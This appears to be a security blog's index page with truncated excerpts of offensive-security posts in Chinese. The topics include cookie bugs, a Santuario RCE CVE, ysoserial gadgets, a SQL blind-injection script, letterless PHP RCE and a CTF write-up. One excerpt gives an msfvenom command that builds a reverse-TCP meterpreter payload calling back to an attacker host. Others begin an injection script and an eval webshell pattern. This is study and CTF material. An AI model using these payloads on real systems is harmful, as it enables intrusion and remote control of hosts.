2024 Daily Notes
1 月 15 号:https://blog.ankursundara.com/cookie-bugs/ 由于旧的 RFC 和 框架实现存在差异问题。导致 cookie 可能存在不同的解释和劫持 The empty cookie Browsers actually allow a cookie with an empty name! javascri…
Older versions of Apache Santuario dependencies lead to RCE
前言 CVE-2022-47966 是一个基于 XSLT 转换解析特性,并且由于小于 1.4.2 版本的 Apache Santuario 在验证 SAML Response 的逻辑顺序的不合理导致的未经授权远程命令执行漏洞。而大于此版本的 Apache Santuario 在经过授权后也仍然可能造成 RCE。凡是使用旧版本的 Apache San…
Develop ysoserial for your Gadget
如何在 ysoerial 上编写你自己的 Gadget 呢? 简单分析一下,主入口需要接收两个参数,第一个参数是类名,第二个参数是执行命令。 类需要实现 ObjectPayload 接口中的 getObject 方法,返回一个泛型对象。这个对象就是需要被序列化的 然后这个类需要有这个注解 @Dependencies({"commons-c…
Binary Search Script for SQL Blind Injection
每次找脚本都花费不少时间,这里存放两个脚本供参考,需要自取修改。 布尔盲注模板: import requests import time url = 'http://aa3f5cdf-f23b-48b0-97f1-ecac497d9e13.node4.buuoj.cn:81/' flag = "" proxies = { &qu…
The way to control host without any file
Powershell Step 1:使用Msfvenom生成一个攻击载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2:在 msf 中启动监听 use ex…
How to Debug a jar
无源码调试 Jar 包 普通可执行 Jar 包 这里先以普通 jar 包为例。在 pom.xml 中的文件插件内容如下: <build> <plugins> <plugin> <artifactId>maven-assembly-plugin</artifactId> <config…
Letterless Malicious Code in PHP
Q:什么时候可能用到这篇文章的内容? A:想要绕过防火墙执行代码的时候。 无字母 RCE 方法可以考虑: 取反 按位异或 自增 POC 上传文件 取反 php 5 无法复现,但是 php 7 可以。原因是PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持 如果目标存在 <?php @eval($_REQ…
Deserialization Bombs detects Java dependencies
当你找到了一个反序列化的点,但是不确定目标存在哪些依赖,从而无法及时构造出合适的 Gadget,实在是令人可惜。那么有没有办法 fuzz 出目标的 class 呢?反序列化炸弹的方式可以做到! 原理:通过构造特殊的多层嵌套 HashSet,导致服务器反序列化的时间复杂度提升,消耗服务器性能,导致延时确认 class。 示例: package yso…
Setup a Recruitment Platform with CTFd
前言 需要在 CTFd 平台中加入当提交 flag 则会在群中播报并且还可以返回排行榜的功能。群聊机器人的实现依赖于 cq-http。整个部署完全使用 Docker。 框架图如下: 在此记录并分享思路。 sign-server 在部署 cqhttp 前,我们需要先搭建签名服务器,用于登录验证。新建一个目录 mkdir -p ~/docker/uni…
Aegis Recruit 2023 Web WriteUp
前言 这是 2023.9.8-2023.10.8 工作室招新赛的题,本人出了一些题目,Web 类型的题解如下。 ClickMe 在浏览器地址栏按 F12 移除 style 中的 pointer-events: none; 再点击中间的文本即可。(注意我 ban 了 f12 和 ctrl+u,只是在页面上 ban,在浏览器地址栏还是可以按出来的) 或…